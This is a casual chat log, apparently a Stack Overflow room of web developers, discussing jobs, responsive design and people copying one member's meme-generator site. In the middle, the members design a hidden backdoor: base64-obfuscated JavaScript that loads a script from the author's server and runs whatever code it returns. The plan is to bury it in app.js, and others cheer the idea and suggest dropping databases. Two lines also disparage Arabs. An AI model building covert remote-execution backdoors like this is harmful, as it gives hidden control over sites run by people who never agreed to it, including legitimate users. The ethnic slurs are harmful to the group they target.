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yeah that makes sense
Haha, sounds fair
Which area are you in, by the way?
Not much great web design going on down here
nothing like in NY or something
@ZachSaucier for your reference, I'm currently working as PHP Webdeveloper for a small company. This is my first full-time job, my first year here, and I have no diploma (quit university at 3rd year). I make €1350 / month and I know it's fairly low
Yeah. But NY would be a lot more expensive to just live in too
@mikedidthis one more question, if the design isn't necessarily responsive and a print designer is behind it and you were asked to make it responsive how would you go about it, use percentages for margins,widths,padding and such ?
great. so I finally get this shit working - there is a shortage of Beagle Bones right now
can't get the volume I need
dafuq is a beagle bone :O
@PatsyIssa urm kinda. I do responsive odd compared to the popular kids.
A tiny hardware thingamajig
@PatsyIssa an aroused dog.
@mikedidthis makes it fully responsive by default, and then starts downgrading the things that don't really need to be responsive
(that's what I imagine at least)
@PatsyIssa but yeah, let the content push the layout, use percentages and padding to add fake margins.
Does anybody know how I should go about getting a copyright for a web deign so that I can start selling it on themeforest?
@CharlesB.Moss there is no such thing, sorry.
@CharlesB.Moss add a watermark
That's all I need to do?
will prevent it from being stolen by amateurs
Not really. They'll steal it with the watermark
Well, that sounds easy enough, thanks
but as you know nothing on the internet is safe ;)
at least they'll have an ugly watermark on it and you'll be able to laugh over it
You can't copyright a website design.
if the watermark includes your contact info, it's free advertisement
@Dark Ashelin yeah I guess so
@PatsyIssa I need 100+
@SomeGuy haha, I am mistaken.
@rlemon i think you're the one behind the shortage :O
@SomeGuy isn't that just "for show" though?
@mikedidthis I don't really know, but I remembered having seen that
It might just be just to be safe or something
I also sometimes add a (c) in my footer
noone cares tho
Haha, yeah, the internet is pretty much a free-for-all
those copyright marks are mostly for show I presume
maybe I could make more money stealing themes ;) jk jk
take "inspiration", remake, resell
I can't laugh at that, sorry.
Yeah, me neither
@PatsyIssa think raspberry pi
It's horrible when people just clone things and try to make money off of your work
cough lemonmeme
Hasn't happened to me. But, you know...empathy and shit
@DarkAshelin but yeah you are right, I make everything responsive by default, even on a fixed things.
Yeah, it's happened to @rlemon and @mikedidthis
@SomeGuy I didn't get cloned, mine were originals. Stolen, but originals :D
@PatsyIssa hardkernel.com/main/main.php is also a good option
It happens on CodePen all the time, haha
@ZachSaucier Yeah, when people just copy and paste stuff instead of forking it
@rlemon fookin arabs
@rlemon Oh, fucking hell
How'd you find it?
time to send another takedown notice.
I search for the meme names I have created
no one else uses "Loktarian" but me
also, the title, meta data, etc is unchanged.
check the people in the filter, rlemon smash :P
just use google image search
it's the defacto tool used by photographers :D
the idiot just copied the code changed the colors and slapped his name on it
@rlemon Ah. Maybe you should add some kind of backdoor in the code
@SomeGuy +1
so you can add a redirect to pornhub or something similar :O
It is already too late. but I have considered it
@BrentMoses wb
//slap easwee
@PatsyIssa this meme was produced with code stolen from lemonmeme.com
or that :P
@easwee Information on interacting with me can be found at this page
@rlemon You should still do it
Add 3-4 so it's not just an easy fix
and add a random script that goes DROP table users every once in a while
tip: safari and IE don't know what the <main> is, add: main { display: block; }
@DarkAshelin I have recently done a lot in Ruby, I know php and others as well. The thing is I am trying to transition to front end work so more so backend stuff is not really helpful
@mikedidthis that sucks that they don't IE needs to get on it's game
@rlemon capitalize the subject
posted on March 12, 2014

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); try { var pageTracker = _gat._getTracker("UA-3727700-1"); pageTracker._trackPageview(); } catch(err) {} Wiiiish me luck.

already sent
My backend skills are fine. I want to work on and build good looking websites off designs
@rlemon They finally fixed it!
@SomeGuy fixed what?
Hahaha, this time's comic is good too
@rlemon The RSS problem SMBC's been having
@BrentMoses well it's worth to think about what kind of functions can produce nice-looking output and are interesting for a company
their build process is by hand.
so I think it is a one off.
Oh, is it?
@BrentMoses Javascript / ajax does a great job at that
Yes I am interested and have been learning javascript/jquery
I would like to get better though
animations / realtime updating site content always looks good to employers
every time I see someone who steals my software I can't help but laugh at the fact that they are including scripts that are never called
think about fancy things like a php datetime switch which shows you different content depending on the date, time or location of the user
@rlemon how did you find the email...
fragbuilder.js -> never called.
@Mr.Alien whois.net
for example, I built something with javascript where you are presented with a google maps of your current location, and you can drag around a cursor which will then show you the coordinates of the current cursor position
it's fancy, employers will be like "ooooooh" AND it can be a useful function to implement into an actual site
@SomeGuy @PatsyIssa @Mr.Alien my new lememe (lemon meme) will be closed source, will have a but load of more options and features, and will contain backdoors in case anyone tried to scrape it. //cc@mikedidthis
@rlemon Awesome!
how to write said back door.... not a damn clue.
I mean, I do encourage open-source, but not at the risk of just constantly being screwed over
I suppose I can just use JS to check the domain, then redirect
@rlemon Just check the hostname
@rlemon I may / may not have made it responsive. ssshh.
lol shweet.
@rlemon great.. but smart developer would try to scrape it anyways, why not try web sockets to generate unique ids?
ahahahaha ^^ one more
You should feel proud
this guy at least changed a bit
<script type='text/javascript' src='js/jquery.js'></script>
<script type='text/javascript' src='js/util.js'></script>
<script type='text/javascript' src='js/fragBuilder.js'></script>
<script type="text/javascript" src="js/bootstrap.js"></script>
<script type="text/javascript" src="js/minicolors.js"></script>
<script type="text/javascript" src="js/notifier.js"></script>
<script type='text/javascript' src="js/app.js"></script>
all my code
still has loktarian :P
at least they stopped using my google analytics tracking codes
@Mr.Alien What's advice-hitler?
damn, somleng.com IS using my tracking code.
mother fucker...
(email sent)
@easwee ask lemon... :p
booom, the clear: both; reached 200
found another one.
<script type='text/javascript' src='js/jquery.js'></script>
<script type='text/javascript' src='js/util.js'></script>
<script type='text/javascript' src='js/fragBuilder.js'></script>
<script type="text/javascript" src="js/bootstrap.js"></script>
<script type="text/javascript" src="js/minicolors.js"></script>
<script type="text/javascript" src="js/notifier.js"></script>
<script type='text/javascript' src="js/app.js"></script>
<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'ADD GOOGLE TRACKING CODE HERE']);
notice anything funny about that?
Unrelated has anyone played dungeon keeper on android
@rlemon I know how to make a backdoor, put in an absolute linked js file, which you keep mostly empty, but when you need it just add stuff in there that messes things up
@DarkAshelin obfuscated jsonp call
@rlemon I dunno what that is but sure
gotta love @DarkAshelin
don't laugh at me
lemon ^^
though it's a bit cheesy, web sockets are way to go, kinda total protection
I still vote for a subtle ajax call which goes DROP DATABASE
(function() {
	var Z = btoa,
		z = atob,
		d = document;
	var s = d[z('Y3JlYXRlRWxlbWVudA==')](z('c2NyaXB0'));
	s[z('c3Jj')] = z('aHR0cDovL2xlbW9ubWVtZS5jb20vZnVja3lvdS5waHA/Y2I9WHpGZ0g=');
easily decoded. but I mean... they can't even figure out which scripts I use and which I don't
That, is a very good point.
what does it do?
see, Zach can't figure it out either
nods understandingly, pretending to know exactly what it does
I'm just more willing to admit defeat than most
@rlemon care to explain some of it?
(function() {
	var Z = btoa,z = atob,d = document;
	var s = d[z('Y3JlYXRlRWxlbWVudA==')](z('c2NyaXB0'));
	s[z('c3Jj')] = z('aHR0cDovL2xlbW9ubWVtZS5jb20vZnVja3lvdS5waHA/Y2I9WHpGZ0g=');
window.XzFgH = XzFgH = function(c) { (new Function(c))() };
full script
I'll decode it, one sec.
looks like base64
wait tell us hints
and have us decode it slowly by ourselves
what is "btoa"?
a function :P
Y3JlYXRlRWxlbWVudA - createElement
(function() {
	var script = document.createElement('script');
	script.src = "http://lemonmeme.com/fuckyou.php?cb=XzFgH";
window.XzFgH = XzFgH = function(c) { (new Function(c))() };
aHR0cDovL2xlbW9ubWVtZS5jb20vZnVja3lvdS5waHA/Y2I9WHpGZ0g= - lemonmeme.com/fuckyou.php?cb=XzFgH
muhaha no one messes with alien..
^^ atob/btoa
I just figured that out cuz of == encoded paddings
so how do you call the decoding without showing the script? Or can it run encoded?
!!> btoa('hello world');
@ZachSaucier we can easily decode that
@rlemon "aGVsbG8gd29ybGQ="
!!> atob('aGVsbG8gd29ybGQ=');
that took long
@Mr.Alien get your base on son!
@rlemon "hello world"
@Mr.Alien Yes I know how to decode it now, but how does he do that on his website without showing it?
someone is killing her
throttling keeps getting hit
I got a crap load of 409's in the console.
@ZachSaucier eval and decode64
I'm glad I don't make popular sites
^ +1, at least for now
instead I just hang around the popular kids in this room while I'm sitting here being retarded
pokes nose
In cryptography, padding refers to a number of distinct practices. Classical cryptography Official messages often start and end in predictable ways: My dear ambassador, Weather report, Sincerely yours, etc. The primary use of padding with classical ciphers is to prevent the cryptanalyst from using that predictability to find cribs that aid in breaking the encryption. Random length padding also prevents an attacker from knowing the exact length of the plaintext message. Many classical ciphers arrange the plaintext into particular patterns (e.g., squares, rectangles, etc.) and if the plain...
no eval
eval raises red flags
(new Function(code))();
on the other hand...
@rlemon a true captain sails even through the red sea
@rlemon Name it main.js or something :p
I don't know what to make of that comment.
@Mr.Alien way over my head. I just know == from base64'ing fonts :D
@SomeGuy no I will bury it in the app.js
Or that
@rlemon So placing the encoded code into a new function decodes it for running?
(new Function("alert(1)"))();
I will pass back js code from the jsonp
makes sense
damn, this is brilliant rlemon.
@mikedidthis he he, but it's always interesting to learn the real things going on behind the scenes :) I learnt the == because I used to encode lot of icons year back, most of the times, those strings ended up with == or = so searched for that..
good job.
thank you!
atob and btoa are big red flags as well
they are base64 encoding / decoding functions
it looked just like gibberish to me
obviously, infact == is a red flag, but not for those who don't give a damn to look at codes
They aren't really that big flags
Most people don't know about them
I could recognize the base 64, but I would have to google how to decode it
It'll be buried in there anywhere
didn't know about atob and btoa
well the people who need to steal my code will be confused as fuck by it.
that is all I care about
Hold on, though
at least arabs won't steal your codes
You're not putting this stuff in the github repo, are you?
afk, smoke.
it will be even better if you make something like supporting variables, kinda one functionality is based on another types, just like bootstrap does
@SomeGuy I will have too
Well, so add some kind of testing for what the domain running it is
And create a blacklist
that is why all this code does is inject code from my server.
Because if it's open source, some people might respect the licence and still host it
then I can change what it does any time
Fair enough
@Mr.Alien coupling is bad though, right?
This chat has been robbing me of my rep adding SO time for the past few days
Welcome to the club
tbh it's more interesting here than there
I've gained maybe 300 rep over the last year
main is full of shitty low quality duplicates
@SomeGuy I tried cleaning up the Tumblr tags yesterday, all the 2+ reps!
I learn way more here
@mikedidthis Hahaha, we wouldn't even get that. Editing privileges mean we don't get rep for editing

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